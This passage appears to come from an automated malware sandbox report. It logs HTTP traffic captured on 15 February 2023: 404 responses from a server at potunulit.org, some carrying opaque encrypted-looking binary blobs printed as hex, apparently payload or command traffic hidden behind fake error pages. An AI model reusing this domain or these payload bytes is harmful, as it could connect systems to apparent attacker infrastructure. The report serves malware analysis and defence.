11 0e 57 33 4c 19 be b2 26 5d 3b e5 01 ca c7 10 b7 85 dd 8e 3a 11 cf 6b 88 cd 4b 98 4f dc cf 96 b8 6e 1f 1d bf 6c 13 d9 53 19 5e 87 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 69 e8 a7 1a 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 68 4e c5 03 1f df a1 61 7e de f5 a2 3f 19 17 7e 4f af 9a a5 34 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 d6 4a 9a 07 fd ec c0 59 78 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 9d ca cd 4f 07 79 82 ae 9c 27 17 4c 35 24 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 5a 4f ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 59 d0 b6 1b 6f d3 cb 29 32 48 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 ef f9 0b e4 a6 0d 11 9f 10 8f d8 b0 99 63 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 e0 b6 92 4e c7 d5 d8 04 7a 17 28 d2 3e 53 1f d0 a3 aa 7a 8f 6c 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 a7 8e 6d 5a b8 e5 7e 4d a2 70 d4 03 4b b9 98 76 6a 0f ca 82 53 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 00 d8 ae 88 c1 74 b4 33 25 09 da a9 c3 48 ca 2f cb e2 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*X?1no3>rZ75%W$Q+W3L&];:kKOnlS^3Ob>!Z:V?#BSSQW+i~ExU$$hNa~?~O4zN.%Qa?|(H
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZKpkZsd4cOzneXbSp6cNoU6wvicszOn0bKuFz98gxg7thXHG6qBu3UyWFZqllDSfmDLp6rI2AdD85kygAggmQAqUm4gOWriJFqejXankMJg0ryvs%2FDkUVDUc9Bg%2BRrp1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0186c272c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TBcMizL5edX5bZTRZ4QDjRz2h6X9RZD2EaBbJiSeYJYHhcgbH%2FkHRcK4VZFhrCPRJgDfYOkQbqYZT8XN6rEKXQSmpHeUWinWTDf7kYHFYtbkkYhG8fry1gr8AuhkfXUx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef0199d9c2c4e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 61 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 49 c0 5f 88 1a 85 a2 4e fb 79 be 26 49 49 35 a1 37 57 37 c2 5d 31 0e 0d 0a Data Ascii: 2aUys/~(`:I_Ny&II57W7]1
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NsNTkdt%2FIMjYd0Gz8%2Bi%2F2%2BfiKQxh2ZWZRt1dJ0Jg8kYIyWS7mOD3VyPLxYQPOqnMs%2FBdZ6pyj3sJECAgTnHK0FGaS6PwRk6xz8Z4Yu11ZVYuwrNYRLopM%2Fxy7HfWCCJu"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef02638aabbb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GbGsm%2BkQSh57TsjMFcUhfYTlNNMp%2FHdFddUSEhGeUI6E2bCamE6qJ89bHOK0eiM6%2Ffq0Go4a%2FTvCE%2Fv94C%2BhYsED5UqzBsIW0bs72gtDwwAJk3KxKfVSm8S9JHXfy2Iz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef027fb81bbb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 84 89 01 53 f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 82 71 cd 6f 09 33 d1 60 73 45 7c 1f 57 44 d3 9e 84 3c 50 15 51 fe 08 a2 83 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed c5 4a b1 17 20 58 4a 33 4f 62 3e 17 21 4b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 70 fb 6f db 97 0d 13 13 bf 9e db 92 c4 0c 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 e4 f3 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 33 6d 10 b9 72 ce cc 23 b2 2d 34 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f d3 cd cc 46 d9 c8 2f ac af ed d9 55 3d f5 80 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 5e b1 1d 32 12 51 8c 10 2d 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 66 0b 2b ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 30 49 3c f1 70 4b ae 03 58 e5 1f e4 a7 7d 10 99 b8 9e d9 b0 9b 3e a3 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 de e0 da 37 5f 81 e3 1c c8 20 f5 43 36 c7 3a 96 49 e7 ea 3f 2e dc e5 78 61 a0 66 fc 0e eb ac 92 08 6a 0f ca 86 e3 28 06 8c 96 ce ea 19 9e d5 8f 00 a8 ca de 21 2c 43 43 98 79 0e 4a 0d 3a 1d fe 6c ac b8 a0 cc c4 a1 39 5b 7b da a9 Data Ascii: 37ae`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*jS5sqo3`sE|WD<PQf}(*jC\SMU`T[UJ XJ3Ob>!K:V/#RSSR+{~EpoOa~i~_zN,%Qa>|(HkJ{
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NeVAxwMFQtLU1iqqGd6KoqPaUvtjXQ2tNSHM%2B4jFg5wFcd%2FYgeMzJixarxqS6vmq%2FJ0EJfsQsTnQbXjBvayu6JdDCoJK2Z0%2FJfnkeT4nAbZlRgUETyPI7GEwd3r%2BocU7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef031eb07bbb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U0n6o8p0wCbd70h4eX956N1r%2Fy3Y8uPN34V0uKiplLTqc0VMQIFDiYycbHQAzJ3D2uNuwdAtKkpRhS2%2FdatGYIqZq1nRUEcmS7TeshZByjLNK0v6aP5hdJPuj80Wi9oG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef032ecacbbb9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 45 c5 5f 89 01 9c a4 54 f2 67 a8 72 0a 4a 79 f5 7e 01 0d 0a Data Ascii: 25Uys/~(`:E_TgrJy~
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0%2BSyZtuuLdnRvMfCRnjLQl6y6n9GbnIrtYnzWjb5y9FSVxjteIzZbjytqyD8rGghBbiM7FkbNK5FcAWkzX9Q6X2t0gQCa1HAi2Nhs%2BcB02tqlcM3DbYwRClAn6HMsu8d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef03859143a6c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S2SAhaRHfz3YR1G6YT259v3mxUB82oAhcxpFRPsutvYYmo7UsKs2drXaFQg5dS1n6dSxEXTmO8MPQXk9WfFaVb%2FoeTJME6DdTpUL8jLmpd5eqJyt6uSx1bvIcNPyzH61"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef03a3c1e3a6c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db a0 02 58 c2 3f 14 31 6e 6f ef fd b2 fc 33 3e a4 72 9d 1f 5a c2 de 37 cb fe 11 bc 90 0c 35 fe fa 25 df 88 57 24 51 89 c0 ab 2b f1 11 0e 57 33 4c 19 be b2 26 5d 3b e5 01 ca c7 10 b7 85 dd 8e 3a 11 cf 6b 88 cd 4b 98 4f dc cf 96 b8 6e 1f 1d bf 6c 13 d9 53 19 5e 87 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 9f 2f 2c 19 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 68 4e c5 03 19 df a1 61 7e de f5 a2 3f 19 17 7e 4f af 9a a5 34 c8 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 91 d6 4a 9a 07 fd ec f2 1d 78 ac 85 2f bd e1 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 9d ca cd 4f 07 79 82 ae 9c 27 17 4c 35 24 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 5a 4f ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bf 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 59 d0 b6 1b 6f d3 cb 29 32 48 e6 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 2f f2 0b e4 a6 0d 11 9f 10 8b d8 b0 99 63 98 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe aa 82 2b a9 b4 bb 04 7a 17 28 d2 3e 53 1f d0 a3 aa 7a 8f 60 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 a5 92 65 50 a6 e5 7e 4d a2 70 d4 03 4b b9 98 76 6a 0f ca 82 57 27 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 00 d8 ae 88 c1 74 b4 33 25 09 da a9 c3 74 ca 2f cb e2 09 e8 8b 23 Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*X?1no3>rZ75%W$Q+W3L&];:kKOnlS^3Ob>!Z:V?#BSSQW+/,~ExU$$hNa~?~O4zN.%Qa
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 15:04:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7NIElE9RU8s6tmGdFUt1UpUU%2B0ergbmCBDFyKHXF4uOkZP%2Fq89OHrUqALIeTPjuukYej3c2ZIf2z9RgyG8OoDsCWV7WPp1%2FTfCUqIyjH%2Fqseqhu8GkMyqsSQuUjSbN8m"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 799ef03e8a683a6c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
